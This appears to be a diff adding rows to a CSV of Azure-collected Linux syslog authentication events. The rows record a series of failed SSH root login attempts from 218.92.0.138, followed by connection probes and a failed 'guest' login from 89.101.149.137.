+8409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:12,UbuntuDevEnv,2019-06-11 11:30:11,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:12,UbuntuDevEnv,2019-06-11 11:30:11,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 1646 ssh2 [preauth],69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,1646,,
+8411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:12,UbuntuDevEnv,2019-06-11 11:30:11,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:12,UbuntuDevEnv,2019-06-11 11:30:11,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.138 port 1646 ssh2],69572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,1646,,
+8413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:16,UbuntuDevEnv,2019-06-11 11:30:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:18,UbuntuDevEnv,2019-06-11 11:30:17,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 12801 ssh2,69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,12801,,
+8415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:23,UbuntuDevEnv,2019-06-11 11:30:20,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 12801 ssh2,69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,12801,,
+8416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:24,UbuntuDevEnv,2019-06-11 11:30:24,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 12801 ssh2,69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,12801,,
+8417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:33,UbuntuDevEnv,2019-06-11 11:30:32,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.138 port 12801 ssh2],69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,12801,,
+8418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:33,UbuntuDevEnv,2019-06-11 11:30:32,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 12801 ssh2 [preauth],69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,12801,,
+8419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:33,UbuntuDevEnv,2019-06-11 11:30:32,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:33,UbuntuDevEnv,2019-06-11 11:30:32,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 12801: Too many authentication failures [preauth],69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,12801,,
+8421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:33,UbuntuDevEnv,2019-06-11 11:30:32,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69679,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:38,UbuntuDevEnv,2019-06-11 11:30:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:41,UbuntuDevEnv,2019-06-11 11:30:40,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 23509 ssh2,69817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,23509,,
+8424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:55,UbuntuDevEnv,2019-06-11 11:30:55,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:55,UbuntuDevEnv,2019-06-11 11:30:55,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,69817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:55,UbuntuDevEnv,2019-06-11 11:30:55,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 23509 ssh2 [preauth],69817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,23509,,
+8427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:55,UbuntuDevEnv,2019-06-11 11:30:55,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.138 port 23509 ssh2],69817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,23509,,
+8428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:55,UbuntuDevEnv,2019-06-11 11:30:55,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 23509: Too many authentication failures [preauth],69817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,23509,,
+8429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:30:59,UbuntuDevEnv,2019-06-11 11:30:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:01,UbuntuDevEnv,2019-06-11 11:31:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 35040 ssh2,69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,35040,,
+8431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:04,UbuntuDevEnv,2019-06-11 11:31:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 35040 ssh2,69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,35040,,
+8432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:16,UbuntuDevEnv,2019-06-11 11:31:15,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.138 port 35040 ssh2],69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,35040,,
+8433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:16,UbuntuDevEnv,2019-06-11 11:31:15,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 35040 ssh2 [preauth],69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,35040,,
+8434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:16,UbuntuDevEnv,2019-06-11 11:31:15,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:16,UbuntuDevEnv,2019-06-11 11:31:15,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 35040: Too many authentication failures [preauth],69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,35040,,
+8436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:16,UbuntuDevEnv,2019-06-11 11:31:15,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69886,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:20,UbuntuDevEnv,2019-06-11 11:31:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:22,UbuntuDevEnv,2019-06-11 11:31:22,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 46996 ssh2,69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46996,,
+8439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:26,UbuntuDevEnv,2019-06-11 11:31:25,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 46996 ssh2,69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46996,,
+8440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:38,UbuntuDevEnv,2019-06-11 11:31:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 46996 ssh2 [preauth],69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46996,,
+8441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:38,UbuntuDevEnv,2019-06-11 11:31:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:38,UbuntuDevEnv,2019-06-11 11:31:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 46996: Too many authentication failures [preauth],69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,46996,,
+8443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:38,UbuntuDevEnv,2019-06-11 11:31:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:38,UbuntuDevEnv,2019-06-11 11:31:37,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 218.92.0.138 port 46996 ssh2],69973,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,46996,,
+8445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:42,UbuntuDevEnv,2019-06-11 11:31:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,70051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:31:45,UbuntuDevEnv,2019-06-11 11:31:44,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.138 port 62547 ssh2,70051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62547,,
+8447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:00,UbuntuDevEnv,2019-06-11 11:32:00,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.138  user=root,70051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+8448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:00,UbuntuDevEnv,2019-06-11 11:32:00,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.138 port 62547 ssh2],70051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62547,,
+8449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:00,UbuntuDevEnv,2019-06-11 11:32:00,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.138 port 62547 ssh2 [preauth],70051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,62547,,
+8450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:00,UbuntuDevEnv,2019-06-11 11:32:00,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.138 port 62547: Too many authentication failures [preauth],70051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,62547,,
+8451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:00,UbuntuDevEnv,2019-06-11 11:32:00,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,70051,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+8452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:13,UbuntuDevEnv,2019-06-11 11:32:12,auth,UbuntuDevEnv,info,Disconnected from 218.92.0.138 port 12446 [preauth],70132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,12446,,
+8453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:13,UbuntuDevEnv,2019-06-11 11:32:12,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.138 port 12446:11:  [preauth],70132,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,12446,,
+8454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:29,UbuntuDevEnv,2019-06-11 11:32:29,auth,UbuntuDevEnv,info,Disconnected from 218.92.0.138 port 19505 [preauth],70195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19505,,
+8455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 11:32:29,UbuntuDevEnv,2019-06-11 11:32:29,auth,UbuntuDevEnv,info,Received disconnect from 218.92.0.138 port 19505:11:  [preauth],70195,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,19505,,
+8456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:32:14,UbuntuDevEnv,2019-06-11 12:32:13,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 27988,83424,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,27988,,
+8457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:33:29,UbuntuDevEnv,2019-06-11 12:33:29,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 29596,83648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,29596,,
+8458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:34:29,UbuntuDevEnv,2019-06-11 12:34:29,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 32687,83857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,32687,,
+8459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:35:19,UbuntuDevEnv,2019-06-11 12:35:18,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 34673,84373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,34673,,
+8460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:36:19,UbuntuDevEnv,2019-06-11 12:36:18,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 36910,84587,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,36910,,
+8461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:37:29,UbuntuDevEnv,2019-06-11 12:37:28,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 38411,84800,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,38411,,
+8462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:52:20,UbuntuDevEnv,2019-06-11 12:52:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 5652,88084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,5652,,
+8463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:53:20,UbuntuDevEnv,2019-06-11 12:53:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 8282,88302,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,8282,,
+8464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:58:20,UbuntuDevEnv,2019-06-11 12:58:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 17083,89353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,17083,,
+8465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:58:54,UbuntuDevEnv,2019-06-11 12:58:54,auth,UbuntuDevEnv,info,Received disconnect from 165.227.128.116 port 52152:11: Bye Bye [preauth],89479,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.128.1,52152,,
+8466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:58:54,UbuntuDevEnv,2019-06-11 12:58:54,auth,UbuntuDevEnv,info,Disconnected from 165.227.128.116 port 52152 [preauth],89479,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.227.128.1,52152,,
+8467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 12:59:20,UbuntuDevEnv,2019-06-11 12:59:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 17945,89570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,17945,,
+8468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:26,UbuntuDevEnv,2019-06-11 13:01:26,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 89.101.149.137 port 20848 ssh2,90137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,89.101.149.1,20848,,
